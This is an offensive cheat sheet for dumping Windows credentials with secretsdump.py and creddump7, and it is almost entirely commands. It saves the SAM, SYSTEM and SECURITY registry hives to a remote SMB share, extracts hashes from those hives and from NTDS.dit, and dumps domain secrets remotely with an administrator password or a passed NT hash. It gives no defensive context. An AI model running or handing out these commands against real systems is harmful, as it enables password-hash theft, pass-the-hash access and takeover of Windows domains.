Secrentsdump.py

# For SAM
# Kali  
git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM
secretsdump.py -sam SAM -system SYSTEM LOCAL

# Windows 
C:\Windows\system32\reg.exe save HKLM\SAM \\10.50.86.39\share\sam.bak 
C:\Windows\system32\reg.exe save HKLM\SYSTEM \\10.50.86.39\share\system.bak
C:\Windows\system32\reg.exe save HKLM\SECURITY \\10.50.86.39\share\security.bak 
# Kali
secretsdump.py -sam sam.bak -system system.bak LOCAL

# For NTDS

# Dump credentails from ntds file locally
Kali> secretsdump.py -ntds ntds.dit -system ../registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

# Remote with Administrative privilege
Kali> secretsdump.py contoso.local/Administrator:Password0-@10.10.10.1 -output secretsdump_contoso_local

# After getting the hash from metasploit for example... 
Kali> secretsdump.py lab.trusted.vl/Administrator@10.10.190.214  -hashes aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07 -output secretsdump_lab_trusted_vl

Last updated